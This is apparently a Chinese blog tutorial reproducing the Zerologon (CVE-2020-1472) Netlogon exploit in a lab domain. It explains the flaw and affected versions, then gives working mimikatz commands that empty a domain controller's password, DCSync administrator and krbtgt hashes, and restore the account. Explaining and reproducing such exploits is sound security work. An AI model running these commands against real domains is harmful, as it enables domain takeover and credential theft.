内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)

最新推荐文章于 2024-04-02 09:31:19 发布
最新推荐文章于 2024-04-02 09:31:19 发布
阅读量5k 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_jia_liang/article/details/123226141
版权

简介

2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。

漏洞原理

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,可以向域发起Netlogon 计算机账户认证请求, 使用8字节全0 client challenge 不断尝试得到一个正确的8字节全0 client credential 通过认证,再通过相关调用完成对域控密码的修改。
具体细节可查看https://www.cynet.com/zerologon/

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用过程

1、检测目标机是否存在cve2020-1472

mimikatz
	lsadump::zerologon  /target:域控IP  /account:域控主机名$



lsadump::zerologon /target:192.168.17.2 /account:WIN-J748588TKU2$

清空域控密码

默认状况下,加域计算机每三十天就会更改一次计算机密码,这个密码会分别被存在计算机本地和AD里面。同时,计算机自己会保存两份密码在本地:当前的密码和以前的密码。当计算机尝试和DC创建secure channel的时候,它会先使用最新的密码,若是这个密码无效,那么它会尝试使用以前的那个密码,若是这个密码也不可以和AD域里面保存的密码匹配,那么计算机和DC之间的secure channel就会被破坏,咱们将不能经过域帐号登陆到这台电脑上

mimikatz
    lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit

---------------------------------------------------------------------------
lsadump::zerologon /target:192.168.17.2 /account:WIN-J748588TKU2$ /exploit

 

获取目标机的HASH

mimikatz:
    lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
--------------------------------------------------------------------------------
lsadump::dcsync /domain:test.com /dc:WIN-J748588TKU2.test.com /user:administrator /authuser:WIN-J748588TKU2$ /authdomain:test.com /authpassword:"" /authntlm

获取hash:

Hash NTLM: 73292305e32730af1b5b94022b2b2aaa

 

恢复密码

在上面的攻击过程中,我们将机器的密码置为空,会导致域控脱域,原因是机器用户在AD中的密码(存储在ntds.dic)与本地注册表里面的不一致。还原域控机器账户的hash,只要将AD中的密码与注册表里面的密码保持一致即可。

mimika:
    lsadump::postzerologon /target:dc.de1ay.com /account:dc$

----------------------------------------------------------------------------

lsadump::postzerologon /target:192.168.17.2 /account:WIN-J748588TKU2$

L_DC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2865
2021年11月,Microsoft 曝出了两个关于 Windows AD 漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致内普通用户升至限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
CVE-2020-1472 NetLogon漏洞1
08-03
CVE-2020-1472 NetLogon漏洞1
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配向导是否缺少授检查漏洞,并且PoC脚本利用queryProtocol方法中的目录遍历。 目录遍历允许从SAP服务器下载任何zip 。 该项目仅出于教育目的而创建,不能用于违法或个人利益。 本项目的作者对本项目的材料造成的任何可能的伤害不承担任何责任 原始发现: CVE-2020-6287: CVE-2020-6286:Yvan'iggy'G 解决方案: , 如何使用 只需指出SAP NW AS Java hostnmae / ip。 还有其他选项: -c检查SAP服务器是否容易受到RECON的攻击 -f从SAP服务器下载zip文件 -u使用
探索CVE-2020-1472:Zerologon漏洞修复与研究
最新发布
gitblog_00084的博客
04-02 428
探索CVE-2020-1472:Zerologon漏洞修复与研究 项目地址:https://gitcode.com/mstxq17/cve-2020-1472 在络安全领,及时发现和应对漏洞是至关重要的。项目链接供了一个专门针对CVE-2020-1472(也称为“Zerologon”)漏洞的研究与修复工具集合,帮助安全专家、开发人员以及IT管理员更好地理解并防御这一威胁。 项目简介 该项目由...
CVE-2020-1472:CVE-2020-1472亦称Zerologon的利用代码
03-18
CVE-2020-1472 CVE-2020-1472又称为Zerologon的检查和利用代码 测试制器是否容易受到Zerologon攻击,如果容易受到攻击,它将把制器的帐户密码字符串。 注意:它可能会破坏生产环境中的内容(例如DNS功能,与复制制器的通信等);这样,目标客户端将无法再向进行身份验证,并且只能通过手动操作来重新同步它们。如果您想了解更多有关Zerologon攻击如何破坏事物的信息,由于,您可以在阅读 Zerologon原创性的研究和白皮书由塞库拉(汤姆Tervoort) - 开发 它将尝试执行Netlogon身份验证绕过。修补制器后,检测脚本将在发送2000对RPC调用后放弃,从而认为目标不容易受到攻击(错误的可能性为0.04%)。 仅当制器使用Active Directory中存储的密码来验证登录尝试而不是本地存储的密码(如果以此方式更改密
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的制器,请如下
服务器排查命令,mimikatz利用zerologon攻击服务器相关命令(附蓝队自查方案)...
weixin_32019361的博客
08-02 618
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下 mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:d...
CVE-2021-42278 & CVE-2021-42287漏洞
good good study
02-17 2761
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户升至限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特属性证书(PAC)的安全绕过漏洞,允许通过假冒制器,使密钥分发中心KDC创建高限票据。
CVE-2020-1472漏洞复现
whojoe的博客
07-08 673
CVE-2020-1472漏洞复现环境漏洞复现mimikatz查看原本hashpoc重密码获取密码恢复密码查看恢复的密码python重密码获取密码1获取机器密码1获取机器密码2恢复密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
ms17010漏洞利用_CVE20201472漏洞
weixin_35039018的博客
01-23 1479
0x01 漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标并且知道计算机名即可利用该漏洞.该漏洞不要求当前计算机在内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重目标密码, 然后利用城...
CVE-2020-1472 NetLogon 漏洞
qq_53579360的博客
02-07 839
windows
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
服务器排查命令,Mimikatz利用Zerologon攻击服务器相关命令(附蓝队自查方案)...
weixin_39590989的博客
08-02 677
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:dc...
ZeroLogon (CVE-2020-1472) 漏洞利用
热门推荐
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位主机名及IP,并且可以访问,就可以在无需任何凭据的情况下 (可在外) 拿到管理员的限。
渗透:结合实战个人思路总结
fuqinderen的博客
01-13 2971
内容: 信息收集,,代理搭建,横向移动,哈希传递,票据制作,跨攻击,上线方式 环境如下: 以钓鱼形式拿下第一台外服务器,记得设beacon响应为实时 首先打开一个记事本准备复制粘贴要用到的数据 可以看到我们不是最高限,第一步肯定是要进行升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁 本电脑为win7 可以看到收集的信息为三级名,三个补丁 指令: shell systeminfo 其他的先不多想,进行,根据版本信息和补丁,ms14_0..
Weblogic核心组件反序列化漏洞修复方案(CVE-2020-14825)
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
01-15 1162
本文源自:http://blog.itpub.net/28833846/viewspace-2729563/ 一、漏洞描述 2020年10月20日,Oracle官方站公布了的关于WebLogic安全漏,其中漏洞风险最高的是weblogic server服务漏洞它对应CVE编号是CVE-2020-14882,WebLogicServer Core组件的安全漏洞对应CVE编号是CVE-2020-14841和 CVE-2020-14825。这些漏洞需要运维项目中重点关注,漏洞攻击的目标是未经身份验证的...
红日靶场vulnstack2(下)
errorr0
06-03 1203
红日靶场二的外内攻击思路
渗透CVE-2020-1472 NetLogon 漏洞
做自己喜欢的事,并将其发挥到极致!
06-23 2264
本篇文章仅用于技术研究和学习,切勿利用文中及手段非法渗透攻击,造成任何后果与本作者无关,切记!CVE-2020-1472 NetLogon 漏洞原因是未经身份认证的攻击者可通过使用NetLogon 远程协议(MS-NRPC)连接制器来利用此漏洞。成功利用此漏洞的攻击者可获得管理员访问限。Netlogon 是在活动目录中比较重要的一个服务,此服务在 DC 和成员服务器上运行,为身份验证供重要服务。...
Netlogon漏洞(CVE-2020-1472)原理分析与验证
weixin_44216796的博客
01-01 304
https://www.secura.com/uploads/whitepapers/Zerologon.pdf https://www.freebuf.com/articles/system/249860.html 漏洞简介 CVE-2020-1472是一个windows中严重的远程漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在Netlogon协议中没有正确使用加密算法而导致的漏洞,由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误.
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows中的严重的远程漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设为全零。这使得在攻击者可以制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程限,并在Windows服务器上执行恶意操作。 为了利用该漏洞,可以使用供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值